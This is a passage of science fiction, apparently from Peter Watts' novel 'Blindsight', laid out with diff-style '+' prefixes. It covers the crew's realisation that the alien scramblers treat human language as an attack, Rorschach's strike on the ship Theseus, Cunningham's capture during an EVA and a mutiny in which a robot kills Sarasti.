+Imagine you have intellect but no insight, agendas but no awareness. Your circuitry hums with strategies for survival and persistence, flexible, intelligent, even technological—but no other circuitry monitors it. You can think of anything, yet are conscious of nothing.
+You can't imagine such a being, can you? The term being doesn't even seem to apply, in some fundamental way you can't quite put your finger on.
+Try.
+Imagine that you encounter a signal. It is structured, and dense with information. It meets all the criteria of an intelligent transmission. Evolution and experience offer a variety of paths to follow, branch-points in the flowcharts that handle such input. Sometimes these signals come from conspecifics who have useful information to share, whose lives you'll defend according to the rules of kin selection. Sometimes they come from competitors or predators or other inimical entities that must be avoided or destroyed; in those cases, the information may prove of significant tactical value. Some signals may even arise from entities which, while not kin, can still serve as allies or symbionts in mutually beneficial pursuits. You can derive appropriate responses for any of these eventualities, and many others.
+You decode the signals, and stumble:
+I had a great time. I really enjoyed him. Even if he cost twice as much as any other hooker in the dome—
+To fully appreciate Kesey's Quartet—
+They hate us for our freedom—
+Pay attention, now—
+Understand.
+There are no meaningful translations for these terms. They are needlessly recursive. They contain no usable intelligence, yet they are structured intelligently; there is no chance they could have arisen by chance.
+The only explanation is that something has coded nonsense in a way that poses as a useful message; only after wasting time and effort does the deception becomes apparent. The signal functions to consume the resources of a recipient for zero payoff and reduced fitness. The signal is a virus.
+Viruses do not arise from kin, symbionts, or other allies.
+The signal is an attack.
+And it's coming from right about there.
+
+*
+
+"Now you get it," Sascha said.
+I shook my head, trying to wrap it around that insane, impossible conclusion. "They're not even hostile." Not even capable of hostility. Just so profoundly alien that they couldn't help but treat human language itself as a form of combat.
+How do you say We come in peace when the very words are an act of war?
+"That's why they won't talk to us," I realized.
+"Only if Jukka's right. He may not be." It was James again, still quietly resisting, still unwilling to concede a point that even her other selves had accepted. I could see why. Because if Sarasti was right, scramblers were the norm: evolution across the universe was nothing but the endless proliferation of automatic, organized complexity, a vast arid Turing machine full of self-replicating machinery forever unaware of its own existence. And we—we were the flukes and the fossils. We were the flightless birds lauding our own mastery over some remote island while serpents and carnivores washed up on our shores. Susan James could not bring herself to concede that point—because Susan James, her multiple lives built on the faith that communication resolves all conflict, would then be forced to admit the lie. If Sarasti was right, there was no hope of reconciliation.
+A memory rose into my mind and stuck there: a man in motion, head bent, mouth twisted into an unrelenting grimace. His eyes focused on one foot, then the other. His legs moved stiffly, carefully. His arms moved not at all. He lurched like a zombie in thrall to rigor mortis.
+I knew what it was. Proprioreceptive polyneuropathy, a case study I'd encountered in ConSensus back before Szpindel had died. This was what Pag had once compared me to; a man who had lost his mind. Only self-awareness remained. Deprived of the unconscious sense and subroutines he had always taken for granted, he'd had to focus on each and every step across the room. His body no longer knew where its limbs were or what they were doing. To move at all, to even remain upright, he had to bear constant witness.
+There'd been no sound when I'd played that file. There was none now in its recollection. But I swore I could feel Sarasti at my shoulder, peering into my memories. I swore I heard him speak in my mind like a schizophrenic hallucination:
+This is the best that consciousness can do, when left on its own.
+"Right answer," I murmured. "Wrong question."
+"What?"
+"Stretch, remember? When you asked it which objects were in the window."
+"And it missed the scrambler." James nodded. "So?"
+"It didn't miss the scrambler. You thought you were asking about the things it saw, the things that existed on the board. Stretch thought you were asking about—"
+"The things it was aware of," she finished.
+"He's right," I whispered. "Oh God. I think he's right."
+"Hey," James said. "Did you see tha—"
+But I never saw what she was pointing at. Theseus slammed its eyelids shut and started howling.
+
+*
+
+Graduation came nine days early.
+We didn't see the shot. Whatever gun port Rorschach had opened was precisely eclipsed on three fronts: the lab-hab hid it from Theseus, and two gnarled extrusions of the artefact itself hid it from each of the gun emplacements. A bolus of incendiary plasma shot from that blind spot like a thrown punch; it had split the inflatable wide open before the first alarm went up.
+Alarms chased us aft. We launched ourselves down the spine through the bridge, through the crypt, past hatches and crawlspaces, fleeing the surface for any refuge with more than a hand's-breadth between skin and sky. Burrowing. ConSensus followed us back, its windows warping and sliding across struts and conduits and the concave tunnel of the spine itself. I paid no attention until we were back in the drum, deep in Theseus' belly. Where we could pretend we were safer.
+Down on the turning deck Bates erupted from the head, tactical windows swirling like ballroom dancers around her. Our own window came to rest on the Commons bulkhead. The hab expanded across that display like a cheap optical illusion: both swelling and shrinking in our sights, that smooth surface billowing towards us while collapsing in on itself. It took me a moment to reconcile the contradiction: something had kicked the hab hard from its far side, sent it careening toward us in a slow, majestic tumble. Something had opened the hab, spilled its atmosphere and left its elastic skin drawing in on itself like a deflating balloon. The impact site swung into view as we watched, a scorched flaccid mouth trailing tenuous wisps of frozen spittle.
+Our guns were firing. They shot nonconducting slugs that would not be turned aside by electromagnetic trickery—invisibly dark and distant to human eyes but I saw them through the tactical crosshairs of the firing robots, watched them sew twin dotted blackbodied arcs across the heavens. The streams converged as the guns tracked their targets, closed on two attenuate throwing stars fleeing spread-eagled through the void, their faces turned to Rorschach like flowers to the sun.
+The guns cut them to pieces before they'd even made it half way.
+But those shredded pieces kept falling, and suddenly the ground beneath was alive with motion. I zoomed the view: scramblers surged across Rorschach's hull like an orgy of snakes, naked to space. Some linked arms, one to another to another, built squirming vertebral daisy-chains anchored at one end. They lifted from the hull, waved through the radioactive vacuum like fronds of articulated kelp, reaching—grasping—
+Neither Bates nor her machines were stupid. They targeted the interlinked scramblers as ruthlessly as they'd gone after the escapees, and with a much higher total score. But there were simply too many targets, too many fragments snatched in passing. Twice I saw dismembered bits of Stretch and Clench caught by their brethren.
+The ruptured hab loomed across ConSensus like a great torn leukocyte. Another alarm buzzed somewhere nearby: proximity alert. Cunningham shot into the drum from somewhere astern, bounced off a cluster of pipes and conduits, grabbed for support. "Holy shit—we are leaving, aren't we? Amanda?"
+"No," Sarasti answered from everywhere.
+"What—" does it fucking take? I caught myself. "Amanda, what if it fires on the ship?"
+"It won't." She didn't take her eyes from her windows.
+"How do you—"
+"It can't. If it had spring-loaded any more firepower we'd have seen a change in thermal and microallometry." A false-color landscape rotated between us, its latitudes measured in time, its longitudes in delta-mass. Kilotons rose from that terrain like a range of red mountains. "Huh. Came in just under the noise lim—"
+Sarasti cut her off. "Robert. Susan. EVA."
+James blanched. "What?" Cunningham cried.
+"Lab module's about to impact," the vampire said. "Salvage the samples. Now." He killed the channel before anyone could argue.
+But Cunningham wasn't about to argue. He'd just seen our death sentence commuted: why would Sarasti care about retrieving biopsy samples if he didn't think we stood a chance of escaping with them? The biologist steadied himself, braced towards the forward hatch. "I'm there," he said, shooting into the bow.
+I had to admit it. Sarasti's psychology was getting better.
+It wasn't working on James, though, or Michelle, or—I couldn't quite tell who was on top. "I can't go out there, Siri, it's—I can't go out there…"
+Just observe. Don't interfere.
+The ruptured inflatable collided impotently to starboard and flattened itself against the carapace. We felt nothing. Far away and far too near, the legions thinned across Rorschach's surface. They disappeared through mouths that puckered and dilated and magically closed again in the artefact's hull. The emplacements fired passionlessly at those who remained.
+Observe.
+The Gang of Four strobed at my side, scared to death.
+Don't interfere.
+"It's okay," I said. "I'll go."
+
+*
+
+The open airlock was like a dimple in the face of an endless cliff. I looked out from that indentation into the abyss.
+This side of Theseus faced away from Big Ben, away from the enemy. The view was still unsettling enough: an endless panorama of distant stars, hard and cold and unwinking. A single, marginally brighter one, shining yellow, still so very far away. Any scant comfort I might have taken from that sight was lost when the sun went out for the briefest instant: a tumbling piece of rock, perhaps. Or one of Rorschach's shovelnosed entourage.
+One step and I might never stop falling.
+But I didn't step, and I didn't fall. I squeezed my pistol, jetted gently through the opening, turned. Theseus' carapace curved away from me in all directions. Towards the prow, the sealed observation blister rose above the horizon like a gunmetal sunrise. Further aft a tattered snowdrift peeked across the hull: the edge of the broken labhab.
+And past it all, close enough to touch, the endless dark cloudscape of Big Ben: a great roiling wall extending to some flat distant horizon I could barely grasp even in theory. When I focused it was dark and endless shades of gray—but dim, sullen redness teased the corner of my eye when I looked away.
+"Robert?" I brought Cunningham's suit feed to my HUD: a craggy, motionless ice field thrown into high contrast by the light of his helmet. Interference from Rorschach's magnetosphere washed over the image in waves. "You there?"
+Pops and crackles. The sound of breath and mumbling against an electrical hum. "Four point three. Four point oh. Three point eight—"
+"Robert?"
+"Three point—shit. What—what are you doing out here, Keeton? Where's the Gang?"
+"I came instead." Another squeeze of the trigger and I was coasting towards the snowscape. Theseus' convex hull rolled past, just within reach. "To give you a hand."
+"Let's move it then, shall we?" He was passing through a crevice, a scorched and jagged tear in the fabric that folded back at his touch. Struts, broken panels, dead robot arms tangled through the interior of the ice cave like glacial debris; their outlines writhed with static, their shadows leaped and stretched like living things in the sweep of his headlight. "I'm almost—"
+Something that wasn't static moved in his headlight. Something uncoiled, just at the edge of the camera's view.
+The feed died.
+Suddenly Bates and Sarasti were shouting in my helmet. I tried to brake. My stupid useless legs kicked against vacuum, obeying some ancient brainstem override from a time when all monsters were earthbound, but by the time I remembered to use my trigger finger the labhab was already looming before me. Rorschach reared up behind it in the near distance, vast and malign. Dim green auroras writhed across its twisted surface like sheet lightning. Mouths opened and closed by the hundreds, viscous as bubbling volcanic mud, any one of them large enough to swallow Theseus whole. I barely noticed the flicker of motion just ahead of me, the silent eruption of dark mass from the collapsed inflatable. By the time Cunningham caught my eye he was already on his way, backlit against the ghastly corpselight flickering on Rorschach's skin.
+I thought I saw him waving, but I was wrong. It was only the scrambler wrapped around his body like a desperate lover, moving his arm back and forth while it ran the thrust pistol tethered to his wrist. Bye-bye, that arm seemed to say, and fuck you, Keeton.
+I watched for what seemed like forever, but no other part of him moved at all.
+Voices, shouting, ordering me back inside. I hardly heard them. I was too dumbfounded by the basic math, trying to make sense of the simplest subtraction.
+Two scramblers. Stretch and Clench. Both accounted for, shot to pieces before my eyes.
+"Keeton, do you read? Get back here! Acknowledge!"
+"I—it can't be," I heard myself say. "There were only two—"
+"Return to the ship immediately. Acknowledge."
+"I—acknowledged..."
+Rorschach's mouths snapped shut at once, as though holding a deep breath. The artefact began to turn, ponderously, a continent changing course. It receded, slowly at first, picking up speed, turning tail and running. How odd, I thought. Maybe it's more afraid than we are...
+But then Rorschach blew us a kiss. I saw it burst from deep within the forest, ethereal and incandescent. It shot across the heavens and splashed against the small of Theseus' back, making a complete and utter fool of Amanda Bates. The skin of our ship flowed there, and opened like a mouth, and congealled in a soundless frozen scream.
+"You cannot prevent and prepare for war at the same time."
+—Einstein
+
+I have no idea whether the scrambler made it back home with its hard-won prize. There was so much lost distance to make up, even if the emplacements didn't pick it off en route. Cunningham's pistol might have run out of fuel. And who knew how long those creatures could survive in vacuum anyway? Maybe there'd been no real hope of success, maybe that scrambler was dead from the moment it had gambled on staying behind. I never found out. It had dwindled and vanished from my sight long before Rorschach dove beneath the clouds and disappeared in turn.
+There had always been three, of course. Stretch, and Clench, and the half-forgotten microwaved remains of a scrambler killed by an uppity grunt—kept on ice next to its living brethren, within easy reach of Cunningham's teleops. I tried to dredge half-glimpsed details from memory, after the fact: had both of those escapees been spheres, or had one been flattened along one axis? Had they thrashed, waved their limbs the way some panicky human might with no ground beneath him? Or had one, perhaps, coasted lifeless and ballistic until our guns destroyed the evidence?
+At this point, it didn't really matter. What mattered was that at long last, everyone was on the same page. Blood had been drawn, war declared.
+And Theseus was paralysed from the waist down.
+Rorschach's parting shot had punched through the carapace at the base of the spine. It had just missed the ramscoop and the telematter assembly. It might have taken out Fab if it hadn't spent so many joules burning through the carapace, but barring some temporary pulse effects it left all critical systems pretty much operational. All it had done was weaken Theseus' backbone enough to make it snap in two should we ever burn hard enough to break orbit. The ship would be able to repair that damage, but not in time.
+If it had been luck it would have been remarkable.
+And now, its quarry disabled, Rorschach had vanished. It had everything it needed from us, for the moment at least. It had information: all the experiences and insights encoded in the salvaged limbs of its martyred spies. If Stretch-or-Clench's gamble had paid off it even had a specimen of its own now, which all things considered we could hardly begrudge it. And so now it lurked invisibly in the depths, resting perhaps. Recharging.
+But it would be back.
+Theseus lost weight for the final round. We shut down the drum in a token attempt to reduce our vulnerable allotment of moving parts. The Gang of Four—uncommanded, unneeded, the very reason for their existence ripped away—retreated into some inner dialog to which other flesh was unwelcome. She floated in the observatory, her eyes closed as tightly as the leaded lids around her. I could not tell who was in control.
+I guessed. "Michelle?"
+"Siri—" Susan. "Just go."
+Bates floated near the floor of the drum, windows arrayed externally across bulkhead and conference table. "What can I do?" I asked.
+She didn't look up. "Nothing."
+So I watched. Bates counted skimmers in one window—mass, inertia, any of a dozen variables that would prove far too constant should any of those shovelnosed missiles come at our throat. They had finally noticed us. Their chaotic electron-dance was shifting now, hundreds of thousands of colossal sledgehammers in sudden flux, reweaving into some ominous dynamic that hadn't yet settled into anything we could predict.
+In another window Rorschach's vanishing act replayed on endless loop: a radar image receding deep into the maelstrom, fading beneath gaseous teratonnes of radio static. It might still be an orbit, of sorts. Judging by that last glimpsed trajectory Rorschach might well be swinging around Ben's core now, passing through crushed layers of methane and monoxide that would flatten Theseus into smoke. Maybe it didn't even stop there; maybe Rorschach could pass unharmed even through those vaster, deeper pressures that made iron and hydrogen run liquid.
+We didn't know. We only knew that it would be back in a little under two hours, assuming it maintained its trajectory and survived the depths. And of course, it would survive. You can't kill the thing under the bed. You can only keep it outside the covers.
+And only for a while.
+A thumbnail inset caught my eye with a flash of color. At my command it grew into a swirling soap bubble, incongruously beautiful, a blue-shifted coruscating rainbow of blown glass. I didn't recognize it for a moment: Big Ben, rendered in some prismatic false-color enhance I'd never seen before. I grunted softly.
+Bates glanced up. "Oh. Beautiful, isn't it?"
+"What's the spectrum?"
+"Longwave stuff. Visible red, infra, down a ways. Good for heat traces."
+"Visible red?" There wasn't any to speak of; mostly cool plasma fractals in a hundred shades of jade and sapphire.
+"Quadrochromatic palette," Bates told me. "Like what a cat might see. Or a vampire." She managed a half-hearted wave at the rainbow bubble. "Sarasti sees something like that every time he looks outside. If he ever looks outside."
+"You'd think he'd have mentioned it," I murmured. It was gorgeous, a holographic ornament. Perhaps even Rorschach might be a work of art through eyes like these...
+"I don't think they parse sight like we do." Bates opened another window. Mundane graphs and contour plots sprang from the table. "They don't even go to Heaven, from what I hear. VR doesn't work on them, they— see the pixels, or something."
+"What if he's right?" I asked. I told myself that I was only looking for a tactical assessment, an official opinion for the official record. But my words came out doubtful and frightened.
+She paused. For a moment I wondered if she, too, had finally lost patience with the sight of me. But she only looked up, and stared off into some enclosed distance.
+"What if he's right," she repeated, and pondered the question that lay beneath: what can we do?
+"We could engineer ourselves back into nonsentience, perhaps. Might improve our odds in the long run." She looked at me, a rueful sort of half-smile at the corner of her mouth. "But I guess that wouldn't be much of a win, would it? What's the difference between being dead, and just not knowing you're alive?"
+I finally saw it.
+How long would it take an enemy tactician to discern Bates' mind behind the actions of her troops on the battlefield? How long before the obvious logic came clear? In any combat situation, this woman would naturally draw the greatest amount of enemy fire: take off the head, kill the body. But Amanda Bates wasn't just a head: she was a bottleneck, and her body would not suffer from a decapitation strike. Her death would only let her troops off the leash. How much more deadly would those grunts be, once every battlefield reflex didn't have to pass through some interminable job stack waiting for the rubber stamp?
+Szpindel had had it all wrong. Amanda Bates wasn't a sop to politics, her role didn't deny the obsolescence of Human oversight at all. Her role depended on it.
+She was more cannon fodder than I. She always had been. And I had to admit: after generations of generals who'd lived for the glory of the mushroom cloud, it was a pretty effective strategy for souring warmongers on gratuitous violence. In Amanda Bates' army, picking a fight meant standing on the battlefield with a bull's-eye on your chest.
+No wonder she'd been so invested in peaceful alternatives.
+"I'm sorry," I said softly.
+She shrugged. "It's not over yet. Just the first round." She took a long, deep breath, and turned back to her study of slingshot mechanics. "Rorschach wouldn't have tried so hard to scare us off in the first place if we couldn't touch it, right?"
+I swallowed. "Right."
+"So there's still a chance." She nodded to herself. "There's still a chance."
+
+*
+
+The demon arranged his pieces for the end game. He didn't have many left. The soldier he placed in the bridge. He packed obsolete linguists and diplomats back in their coffin, out of sight and out of the way.
+He called the jargonaut to his quarters— and although it would be the first time I'd seen him since the attack, his summons carried not the slightest trace of doubt that I would obey. I did. I came on command, and saw that he had surrounded himself with faces.
+Every last one of them was screaming.
+There was no sound. The disembodied holograms floated in silent tiers around the bubble, each contorted into a different expression of pain. They were being tortured, these faces; half a dozen real ethnicities and twice as many hypothetical ones, skin tones ranging from charcoal to albino, brows high and slanted, noses splayed or pointed, jaws receding or prognathous. Sarasti had called the entire hominid tree into existence around him, astonishing in their range of features, terrifying in their consistency of expression.
+A sea of tortured faces, rotating in slow orbits around my vampire commander.
+"My God, what is this?"
+"Statistics." Sarasti seemed focused on a flayed Asian child. "Rorschach's growth allometry over a two-week period."
+"They're faces…"
+He nodded, turning his attention to a woman with no eyes. "Skull diameter scales to total mass. Mandible length scales to EM transparency at one Angstrom. One hundred thirteen facial dimensions, each presenting a different variable. Principle-component combinations present as multifeature aspect ratios." He turned to face me, his naked gleaming eyes just slightly sidecast. "You'd be surprised how much gray matter is dedicated to the analysis of facial imagery. Shame to waste it on anything as—counterintuitive as residual plots or contingency tables."
+I felt my jaw clenching. "And the expressions? What do they represent?"
+"Software customizes output for user."
+An agonized gallery pled for mercy on all sides.
+"I am wired for hunting," he reminded gently.
+"And you think I don't know that," I said after a moment.
+He shrugged, disconcertingly human. "You ask."
+"Why am I here, Jukka? You want to teach me another object lesson?"
+"To discuss our next move."
+"What move? We can't even run away."
+"No." He shook his head, baring filed teeth in something approaching regret.
+"Why did we wait so long?" Suddenly my sullen defiance had evaporated. I sounded like a child, frightened and pleading. "Why didn't we just take it on when we first got here, when it was weaker…?"
+"We need to learn things. For next time."
+"Next time? I thought Rorschach was a dandelion seed. I thought it just—washed up here—"
+"By chance. But every dandelion is a clone. Their seeds are legion." Another smile, not remotely convincing— "And maybe it takes more than one try for the placental mammals to conquer Australia."
+"It'll annihilate us. It doesn't even need those spitballs, it could pulverize us with one of those scramjets. In an instant."
+"It doesn't want to."
+"How do you know?"
+"They need to learn things too. They want us intact. Improves our odds."
+"Not enough. We can't win."
+This was his cue. This was the point at which Uncle Predator would smile at my naiveté, and take me into his confidence. Of course we're armed to the teeth, he would say. Do you think we'd come all this way, face such a vast unknown, without the means to defend ourselves? Now, at last, I can reveal that shielding and weaponry account for over half the ship's mass…
+It was his cue.
+"No," he said. "We can't win."
+"So we just sit here. We just wait to die for the next—the next sixty-eight minutes..."
+Sarasti shook his head. "No."
+"But—" I began.
+"Oh," I finished.
+Because of course, we had just topped up our antimatter reserves. Theseus was not equipped with weapons. Theseus was the weapon. And we were, in fact, going to sit here for the next sixty-eight minutes, waiting to die.
+But we were going to take Rorschach with us when we did.
+Sarasti said nothing. I wondered what he saw, looking at me. I wondered if there actually was a Jukka Sarasti behind those eyes to see, if his insights—always ten steps ahead of our own— hailed not so much from superior analytical facilities as from the timeworn truth that it takes one to know one.
+Whose side, I wondered, would an automaton take?
+"You have other things to worry about," he said.
+He moved towards me; I swear, all those agonized faces followed him with their eyes. He studied me for a moment, the flesh crinkling around his eyes. Or maybe some mindless algorithm merely processed visual input, correlated aspect ratios and facial tics, fed everything to some output subroutine with no more awareness than a stats program. Maybe there was no more spark in this creature's face than there was in all the others, silently screaming in his wake.
+"Is Susan afraid of you?" the thing before me asked.
+"Su—why should she be?"
+"She has four conscious entities in her head. She's four times more sentient than you. Doesn't that make you a threat?"
+"No, of course not."
+"Then why should you feel threatened by me?"
+And suddenly I didn't care any more. I laughed out loud, with minutes to live and nothing to lose. "Why? Maybe because you're my natural enemy, you fucker. Maybe because I know you, and you can't even look at one of us without flexing your claws. Maybe because you nearly ripped my fucking hand off and raped me for no good reason—"
+"I can imagine what it's like," he said quietly. "Please don't make me do it again."
+I fell instantly silent.
+"I know your race and mine are never on the best of terms." There was a cold smile in his voice if not on his face. "But I do only what you force me to. You rationalize, Keeton. You defend. You reject unpalatable truths, and if you can't reject them outright you trivialize them. Incremental evidence is never enough for you. You hear rumors of Holocaust; you dismiss them. You see evidence of genocide; you insist it can't be so bad. Temperatures rise, glaciers melt—species die—and you blame sunspots and volcanoes. Everyone is like this, but you most of all. You and your Chinese Room. You turn incomprehension into mathematics, you reject the truth without even knowing what it is."
+"It served me well enough." I wondered at the ease with which I had put my life into the past tense.
+"Yes, if your purpose is only to transmit. Now you have to convince. You have to believe."
+There were implications there I didn't dare to hope for. "Are you saying—"
+"Can't afford to let the truth trickle through. Can't give you the chance to shore up your rationales and your defenses. They must fall completely. You must be inundated. Shattered. Genocide's impossible to deny when you're buried up to your neck in dismembered bodies."
+He'd played me. All this time. Preconditioning me, turning my topology inside-out.
+I'd known something was going on. I just hadn't understood what.
+"I'd have seen right through it," I said, "if you hadn't made me get involved."
+"You might even read it off me directly."
+"That's why you—" I shook my head. "I thought that was because we were meat."
+"That too," Sarasti admitted, and looked right at me.
+For the first time, I looked right back. And felt a shock of recognition.
+I still wonder why I never saw it before. For all those years I remembered the thoughts and feelings of some different, younger person, some remnant of the boy my parents had hacked out of my head to make room for me. He'd been alive. His world had been vibrant. And though I could call up the memories of that other consciousness, I could barely feel anything within the constraints of my own.
+Perhaps dreamstate wasn't such a bad word for it…
+"Like to hear a vampire folk tale?" Sarasti asked.
+"Vampires have folk tales?"
+He took it for a yes. "A laser is assigned to find the darkness. Since it lives in a room without doors, or windows, or any other source of light, it thinks this will be easy. But everywhere it turns it sees brightness. Every wall, every piece of furniture it points at is brightly lit. Eventually it concludes there is no darkness, that light is everywhere."
+"What the hell are you talking about?"
+"Amanda is not planning a mutiny."
+"What? You know about—"
+"She doesn't even want to. Ask her if you like."
+"No—I—"
+"You value objectivity."
+It was so obvious I didn't bother answering.
+He nodded as if I had. "Synthesists can't have opinions of their own. So when you feel one, it must be someone else's. The crew holds you in contempt. Amanda wants me relieved of command. Half of us is you. I think the word is project. Although,"—he cocked his head a bit to one side—"lately you improve. Come."
+"Where?"
+"Shuttle bay. Time to do your job."
+"My—"
+"Survive and bear witness."
+"A drone—"
+"Can deliver the data—assuming nothing fries its memory before it gets away. It can't convince anyone. It can't counter rationalizations and denials. It can't matter. And vampires—" he paused—"have poor communications skills."
+It should have been cause for petty, selfish rejoicing.
+"It all comes down to me," I said. "That's what you're saying. I'm a fucking stenographer, and it's all on me."
+"Yes. Forgive me for that."
+"Forgive you?"
+Sarasti waved his hand. All faces save two disappeared.
+"I don't know what I'm doing."
+
+*
+
+The news bloomed across ConSensus a few seconds before Bates called it aloud: Thirteen skimmers had not reappeared from behind Big Ben on schedule. Sixteen. Twenty-eight.
+And counting.
+Sarasti clicked to himself as he and Bates played catch-up. Tactical filled with luminous multicolored threads, a tangle of revised projections as intricate as art. The threads wrapped Ben like a filamentous cocoon; Theseus was a naked speck in the middle distance.
+I expected any number of those lines to skewer us like needles through a bug. Surprisingly, none did; but the projections only extended twenty-five hours into the future, and were reliable for only half that. Not even Sarasti and the Captain could look so far ahead with that many balls in the air. It was something, though, the faintest silver lining: that all these high-speed behemoths couldn't simply reach out and swat us without warning. Evidently they still had to ease into the curve.
+After Rorschach's dive, I'd been starting to think the laws of physics didn't apply.
+The trajectories were close enough, though. At least three skimmers would be passing within a hundred kilometers on their next orbits.
+Sarasti reached for his injector, the blood rising in his face. "Time to go. We refit Charybdis while you're sulking."
+He held the hypo to his throat and shot up. I stared at ConSensus, caught by that bright shifting web like a moth by a streetlight.
+"Now, Siri."
+He pushed me from his quarters. I sailed into the passageway, grabbed a convenient rung—and stopped.
+The spine was alive with grunts, patrolling the airspace, standing guard over the fab plants and shuttle 'locks, clinging like giant insects to the rungs of unrolling spinal ladders. Slowly, silently, the spine itself was stretching.
+It could do that, I remembered. Its corrugations flexed and relaxed like muscle, it could grow up to two hundred meters to accommodate any late-breaking need for a bigger hanger or more lab space.
+Or more infantry. Theseus was increasing the size of the battlefield.
+"Come." The vampire turned aft.
+Bates broke in from up front. "Something's happening."
+An emergency handpad, geckoed to the expanding bulkhead, slid past to one side. Sarasti grabbed it and tapped commands. Bates' feed appeared on the bulkhead: a tiny chunk of Big Ben, an EM-enhanced equatorial quadrant only a few thousand klicks on a side. The clouds boiled down there, a cyclonic knot of turbulence swirling almost too fast for realtime. The overlay described charged particles, bound in a deep Parker spiral. It spoke of great mass, rising.
+Sarasti clicked.
+"DTI?" Bates said.
+"Optical only." Sarasti took my arm and dragged me effortlessly astern. The display paced us along the bulkhead: seven skimmers shot from the clouds as I watched, a ragged circle of scramjets screaming red-hot into space. ConSensus plotted their paths in an instant; luminous arcs rose around our ship like the bars of a cage.
+Theseus shuddered.
+We've been hit, I thought. Suddenly the spine's plodding expansion cranked into overdrive; the pleated wall lurched and accelerated, streaming past my outstretched fingers as the closed hatch receded up ahead—
+—receded overhead.
+The walls weren't moving at all. We were falling, to the sudden strident bleating of an alarm.
+Something nearly yanked my arm from its socket: Sarasti had reached out with one hand and caught a rung, reached with his other and caught me before we'd both been flattened against the Fab plant. We dangled. I must have weighed two hundred kilograms; the floor shuddered ten meters below my feet. The ship groaned around us. The spine filled with the screech of torquing metal. Bates' grunts clung to its walls with clawed feet.
+I reached for the ladder. The ladder pulled away: the ship was bending in the middle and down had started to climb the walls. Sarasti and I swung towards the center of the spine like a daisy-chain pendulum.
+"Bates! James!" The vampire roared. His grip on my wrist trembled, slipping. I strained for the ladder, swung, caught it.
+"Susan James has barricaded herself in the bridge and shut down autonomic overrides." An unfamiliar voice, flat and affectless. "She has initiated an unauthorized burn. I have begun a controlled reactor shutdown; be advised that the main drive will be offline for at least twenty-seven minutes."
+The ship, I realized, its voice raised calmly above the alarm. The Captain itself. On Public Address.
+That was unusual.
+"Bridge!" Sarasti barked. "Open channel!"
+Someone was shouting up there. There were words, but I couldn't make them out.
+Without warning, Sarasti let go.
+He dropped obliquely in a blur. Aft and opposite, the bulkhead waited to swat him like an insect. In half a second both his legs would be shattered, if the impact didn't kill him outright—
+But suddenly we were weightless again, and Jukka Sarasti—purple-faced, stiff-limbed— was foaming at the mouth.
+"Reactor offline," the Captain reported. Sarasti bounced off the wall.
+He's having a seizure, I realized.
+I released the ladder and pushed astern. Theseus swung lopsidedly around me. Sarasti convulsed in mid-air; clicks and hisses and choking sounds stuttered from his mouth. His eyes were so wide they seemed lidless. His pupils were mirror-red pinpoints. The flesh twitched across his face as though trying to crawl off.
+Ahead and behind, battlebots held their position and ignored us.
+"Bates!" I yelled up the spine. "We need help!"
+Angles, everywhere. Seams on the shield plates. Sharp shadows and protrusions on the surface of every drone. A two-by-three matrix of insets, bordered in black, floating over the main ConSensus display: two big interlinked crosses right in front of where Sarasti had been hanging.
+This can't be happening. He just took his antiEuclideans. I saw him. Unless...
+Someone had spiked Sarasti's drugs.
+"Bates!" She should be linked into the grunts, they should have leapt forward at the first sign of trouble. They should be dragging my commander to the infirmary by now. They waited stolid and immobile. I stared at the nearest: "Bates, you there?" And then—in case she wasn't—I spoke to the grunt directly. "Are you autonomous? Do you take verbal orders?"
+On all sides the robots watched; the Captain just laughed at me, its voice posing as an alarm.
+Infirmary.
+I pushed. Sarasti's arms flailed randomly against my head and shoulders. He tumbled forward and sideways, hit the moving ConSensus display dead center, bounced away up the spine. I kicked off in his wake—
+—and glimpsed something from the corner of my eye—
+—and turned—
+—And dead center of ConSensus, Rorschach erupted from Ben's seething face like a breaching whale. It wasn't just the EM-enhance: the thing was glowing, deep angry red. Enraged, it hurled itself into space, big as a mountain range.
+Fuck fuck fuck.
+Theseus lurched. The lights flickered, went out, came back on again. The turning bulkhead cuffed me from behind.
+"Backups engaged," the Captain said calmly.
+"Captain! Sarasti's down!" I kicked off the nearest ladder, bumped into a grunt and headed forward after the vampire. "Bates isn't—what do I do?"
+"Nav offline. Starboard afferents offline."
+It wasn't even talking to me, I realized. Maybe this wasn't the Captain at all. Maybe it was pure reflex: a dialog tree, spouting public-service announcements. Maybe Theseus had already been lobotomized. Maybe this was only her brain stem talking.
+Darkness again. Then flickering light.
+If the Captain was gone, we were screwed.
+I gave Sarasti another push. The alarm bleated on. The drum was twenty meters ahead; BioMed was just the other side of that closed hatch. The hatch had been open before, I remembered. Someone had shut it in the last few minutes. Fortunately Theseus had no locks on her doors.
+Unless the Gang barricaded it before they took the bridge...
+"Strap in, people! We are getting out of here!"
+Who in hell…?
+The open bridge channel. Susan James, shouting up there. Or someone was; I couldn't quite place the voice...
+Ten meters to the drum. Theseus jerked again, slowed her spin. Stabilised.
+"Somebody start the goddamned reactor! I've only got attitude jets up here!"
+"Susan? Sascha?" I was at the hatch. "Who is that?" I pushed passed Sarasti and reached to open it.
+No answer.
+Not from ConSensus, anyway. I heard a muted hum from behind, saw the ominous shifting of shadows on the bulkhead just a moment too late. I turned in time to see one of the grunts raise a spiky appendage—curved like a scimitar, needle-tipped—over Sarasti's head.
+I turned in time to see it plunge into his skull.
+I froze. The metal proboscis withdrew, dark and slick. Lateral maxillipeds began nibbling at the base of Sarasti's skull. His pithed corpse wasn't thrashing now; it only trembled, a sack of muscles and motor nerves awash in static.
+Bates.
+Her mutiny was underway. No, their mutiny—Bates and the Gang. I'd known. I'd imagined it. I'd seen it coming.
+He hadn't believed me.
+The lights went out again. The alarm fell silent. ConSensus dwindled to a flickering doodle on the bulkhead and disappeared; I saw something there in that last instant, and refused to process it. I heard breath catch in my throat, felt angular monstrosities advancing through the darkness. Something flared directly ahead, a bright brief staccato in the void. I glimpsed curves and angles in silhouette, staggering. The buzzing crackle of shorting circuitry. Metal objects collided nearby, unseen.
+From behind the crinkle of the drum hatch, opening. A sudden beam of harsh chemical light hit me as I turned, lit the mechanical ranks behind; they simultaneously unclamped from their anchorages and floated free. Their joints clicked in unison like an army stamping to attention
+"Keeton!" Bates snapped, sailing through the hatch. "You okay?"
+The chemlight shone from her forehead. It turned the interior of the spine into a high-contrast mosaic, all pale surfaces and sharp moving shadows. It spilled across the grunt that had killed Sarasti; the robot bounced down the spine, suddenly, mysteriously inert. The light washed across Sarasti's body. The corpse turned slowly on its axis. Spherical crimson beads emerged from its head like drops of water from a leaky faucet. They spread in a winding, widening trail, spot-lit by Bates' headlamp: a spiral arm of dark ruby suns.
+I backed away. "You—"
